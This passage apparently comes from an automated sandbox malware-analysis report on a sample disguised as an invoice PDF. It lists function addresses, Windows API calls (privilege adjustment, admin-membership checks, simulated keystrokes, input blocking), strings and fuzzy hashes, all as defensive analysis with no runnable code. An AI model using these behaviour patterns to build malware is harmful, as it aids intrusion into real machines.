Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e6634ef1f1cf553940349ee3d284e99854a98cefd423b437a59bbc8382b7cf6e
Instruction ID: f0a91f49a73f4d2670ce6a8201a05471ec36f34d493f05d08f924ae8020d6c70
Opcode Fuzzy Hash: e6634ef1f1cf553940349ee3d284e99854a98cefd423b437a59bbc8382b7cf6e
Instruction Fuzzy Hash: F431D67490121C9BCB21DF65DD897DDBBB8AF08310F5042EAE80CA7260E7749F818F48

Function 004851CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004851DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00485238
SetErrorMode.KERNEL32(00000000), ref: 004852A1

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: cbfd20ac1b9916423c1bd9f7b370c35ce454e305f9f13a635842239b7a4dcb63
Instruction ID: b46b3ddad400828f7b0c3bd4e6fbbc9f4f51c2a9c9057384e1868e1abc44f79b
Opcode Fuzzy Hash: cbfd20ac1b9916423c1bd9f7b370c35ce454e305f9f13a635842239b7a4dcb63
Instruction Fuzzy Hash: 1F314F75A00518DFDB00EF55D8C4EADBBB4FF49318F04849AE8059B392DB35E856CB54

Function 004716C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0042FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00430668
Part of subcall function 0042FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00430685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0047170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0047173A
GetLastError.KERNEL32 ref: 0047174A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: a43c4294e2434a6ace6ce3a3231e28f1df9bdaea0dd8dcfc6f689b1959f71d38
Instruction ID: 18fc88071497311a0cba97fe41d400e6cfb07f12cfe12254bab8d2776a0ad4d1
Opcode Fuzzy Hash: a43c4294e2434a6ace6ce3a3231e28f1df9bdaea0dd8dcfc6f689b1959f71d38
Instruction Fuzzy Hash: E811C1B2514304AFD7189F54ECC6DABBBBDEB04714B60C52EE05693251EB74BC418B68

Function 0047D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0047D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0047D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0047D650

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: a6742f7660be72c51bd600da9fc50fb6fdfdd852e52e12c84e56d818b71834be
Instruction ID: b5a699aacca66e5602bb2e1963d6860e8a37be59f87fb75179525ac0aaec123b
Opcode Fuzzy Hash: a6742f7660be72c51bd600da9fc50fb6fdfdd852e52e12c84e56d818b71834be
Instruction Fuzzy Hash: 24117C71E01228BBDB108F949C84FAFBFBCEB45B50F108122F908E7290D6704A018BA5

Function 00471663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0047168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004716A1
FreeSid.ADVAPI32(?), ref: 004716B1

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: a259ebb3a9bd4bc8146d36e062b05acaa742873583dce6b6539371f138a4ed5c
Instruction ID: 0e2bef568d4ae50979519424c85f10ed086d26084bc358bcbfc30b265d87147d
Opcode Fuzzy Hash: a259ebb3a9bd4bc8146d36e062b05acaa742873583dce6b6539371f138a4ed5c
Instruction Fuzzy Hash: FAF0F47195030DFBDB00DFE49C89EAEBBBCEB09604F508565E501E2191E774AA448A54

Function 00434CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(004428E9,?,00434CBE,004428E9,004D88B8,0000000C,00434E15,004428E9,00000002,00000000,?,004428E9), ref: 00434D09
TerminateProcess.KERNEL32(00000000,?,00434CBE,004428E9,004D88B8,0000000C,00434E15,004428E9,00000002,00000000,?,004428E9), ref: 00434D10
ExitProcess.KERNEL32 ref: 00434D22

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 055a9437ebe809f51264ae9737a8e9a537305b218d522fa2cea4adfab8ac1e9c
Instruction ID: e2ce1280af31f4e8cff46ac7f0b083e64033e412971894a31d71b14f0566a782
Opcode Fuzzy Hash: 055a9437ebe809f51264ae9737a8e9a537305b218d522fa2cea4adfab8ac1e9c
Instruction Fuzzy Hash: 6EE0B631000148ABDFA1AF55DD49A993F69EB86785F104029FC159A232CB39ED42CB88

Function 0044C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0044C36C

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: c0ed885b057a154dd4d4a007440493614cf3c8344ddb9dce7dacc7a261998021
Instruction ID: 8369cdf84fbea0b1922c9144b817f9f71b20c85c1454a9d6c02d077b6d318009
Opcode Fuzzy Hash: c0ed885b057a154dd4d4a007440493614cf3c8344ddb9dce7dacc7a261998021
Instruction Fuzzy Hash: 164149729012196FDB209FB9CC88EBB77B9EB84314F1442AEF905C7280E6749D41CB58

Function 0046D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0046D28C

Strings

X64, xrefs: 0046D2A8

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 893398ad9dafa3edd6b738b8f27ec3f3615b9fdb97cc81ed712a2810b442ca0d
Instruction ID: ed0a3ed3a20f4c6a0c6a86f509358568946b49f33e52ce0ab44c71645a3f08ea
Opcode Fuzzy Hash: 893398ad9dafa3edd6b738b8f27ec3f3615b9fdb97cc81ed712a2810b442ca0d
Instruction Fuzzy Hash: FAD0C9B4D0516DEACB90CB90ECC8DD9B77CBB04305F100192F106A2000DB3495498F15

Function 0043CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 93108dced47ae960ecb6207f19bdd7daf14b010d4f522f71b178ba6952163ed0
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 25021D72E002199BDF14CFA9C9C06AEFBF1EF48314F25916AD819F7384D735AA418B94

Function 0041CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#N, xrefs: 0041CF7F
Variable is not of type 'Object'., xrefs: 00460C40

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#N
API String ID: 0-3233274810
Opcode ID: 3d353202939078efa9f138f8af27e677d1fc2032ee85fee745589c9da743eea1
Instruction ID: eaf1ae8991d39c9fd18ce6b6a1c7b5a3536a6b9310fb3bb73bb85a732cb4285a
Opcode Fuzzy Hash: 3d353202939078efa9f138f8af27e677d1fc2032ee85fee745589c9da743eea1
Instruction Fuzzy Hash: 77328E70940218DBDF14DF90D981AEEB7B5FF04308F14405BE806AB392E779AD86CB5A

Function 004868EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00486918
FindClose.KERNEL32(00000000), ref: 00486961

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 59ebd294e15c8fe6538ac749b4ab6692e04ffde2667a46df7be83a552f42afa5
Instruction ID: 9d71941b85c6fcdba99199f5a1609a0b72cbea65a5800d56cdd19460d75f049e
Opcode Fuzzy Hash: 59ebd294e15c8fe6538ac749b4ab6692e04ffde2667a46df7be83a552f42afa5
Instruction Fuzzy Hash: 621181716042009FD710DF29D8C4A1ABBE5EF85328F15C6AEE4698F7A2C734EC45CB95

Function 004837B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00494891,?,?,00000035,?), ref: 004837E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00494891,?,?,00000035,?), ref: 004837F4

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 295630e2b1e9e957311442b28fb958319a2b6bf2a0c6e5f17827b673313ac04c
Instruction ID: 9eeae545dbadd5be335424df86c9b4d180ad6a20f6f13cbd3374a379a3265c39
Opcode Fuzzy Hash: 295630e2b1e9e957311442b28fb958319a2b6bf2a0c6e5f17827b673313ac04c
Instruction Fuzzy Hash: 8FF0EC71A042142AD75027664C4DFDB7A9DDFC5B65F000176F505D2291D9609D44C7F8

Function 0047B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0047B25D
keybd_event.USER32(?,7707C0D0,?,00000000), ref: 0047B270

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 34c6daeecc7c90afa9245fa8cd82a39deb64df1fd9a568f54d6be64025163a19
Instruction ID: 27d8c012cca1ca3818a3cc571a97bf8d54cc97717b1acda51ea59f53da98aea9
Opcode Fuzzy Hash: 34c6daeecc7c90afa9245fa8cd82a39deb64df1fd9a568f54d6be64025163a19
Instruction Fuzzy Hash: 9AF01D7580424EABDB059FA0C805BFE7FB4FF09309F00805AF955A5192C37986119F98

Function 004710BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004711FC), ref: 004710D4
CloseHandle.KERNEL32(?,?,004711FC), ref: 004710E9

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: fb92f700d01d0df7a5148acaa7cd80f0d8240c10a0bc1c35d581887eeca00200
Instruction ID: 99b901fce3db8f87312295d95c22310121ec12dc42d2ff0e07c4f11101fcbfc5
Opcode Fuzzy Hash: fb92f700d01d0df7a5148acaa7cd80f0d8240c10a0bc1c35d581887eeca00200
Instruction Fuzzy Hash: D3E04F32018610AEE7252B61FC05EB37BA9EF04310B10883EF4A6804B1DB626C90DB58

Function 0044676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00446766,?,?,00000008,?,?,0044FEFE,00000000), ref: 00446998

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 7e0699f6885c9e0e35e63e4f06ff1928b36fabb1e40a5a5284bea70460529ed5
Instruction ID: d393cb3b16803b487488d236cd6f9d7c94727054d244dfda872452f66f586e50
Opcode Fuzzy Hash: 7e0699f6885c9e0e35e63e4f06ff1928b36fabb1e40a5a5284bea70460529ed5
Instruction Fuzzy Hash: DDB16E71610608DFE715CF28C486B657BE0FF46364F268659E899CF3A2C339D982CB46

Function 0042B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0046851F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3f88c311f12813d9ae2998550c1f4482843a08754cbfa491248a302a7f4aef57
Instruction ID: 76232ba2bdb4dd4a55621ba40e147716257af1688b8bdec1df18873947bd21c7
Opcode Fuzzy Hash: 3f88c311f12813d9ae2998550c1f4482843a08754cbfa491248a302a7f4aef57
Instruction Fuzzy Hash: 07126F71A002299BCB14DF58D8806EEB7B5FF48310F54819BE849EB355EB389E81CF95

Function 0048EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0048EABD

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 7212ef0b92fc8f380ed5a3efaf03d38414c787674acb62c3cddc732ad52ca21e
Instruction ID: 1781a261ba94e53d80adcaf363e293251e87bf873f1f1829f6dab33583834531
Opcode Fuzzy Hash: 7212ef0b92fc8f380ed5a3efaf03d38414c787674acb62c3cddc732ad52ca21e
Instruction Fuzzy Hash: 1BE01A31200204AFC710EF5AD844E9ABBE9AF98764F00842BFC49C7391DA74E8818B95

Function 004309D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,004303EE), ref: 004309DA

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a069eac97da2023fc5ff85f1cb8ec43ecea8412b9b591cdbb40bca010c4db709
Instruction ID: 991ab77617efdda4c5f72285da7c0ec40fb0d159deb7bbb2cff1c3768c8cb150
Opcode Fuzzy Hash: a069eac97da2023fc5ff85f1cb8ec43ecea8412b9b591cdbb40bca010c4db709
Instruction Fuzzy Hash:

Function 0043781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0043798B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 110126e8969a0e9dd53842a00397caa192adff14845f88466a9de7126b6a3ff4
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: DF5134E160C7456AEB3C6629449A7BF67859F0E344F183A0FE8C287382C61DDE02D35E

Function 00482046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&N, xrefs: 00482053

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID: 0&N
API String ID: 0-2307969841
Opcode ID: 07183efe61759c0c6122caa06fbb8e47cfae173e81ac29cc90237ca9693c9288
Instruction ID: 5a794de70105e9bdb6ded61bf82c1de75a8d5c1544ed8ab870e91f3ec8027bfd
Opcode Fuzzy Hash: 07183efe61759c0c6122caa06fbb8e47cfae173e81ac29cc90237ca9693c9288
Instruction Fuzzy Hash: 8421EB326206118BDB28CF79C91367E73E9A754310F148A2EE4A7C73D1DEB9A904C784

Function 00446DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

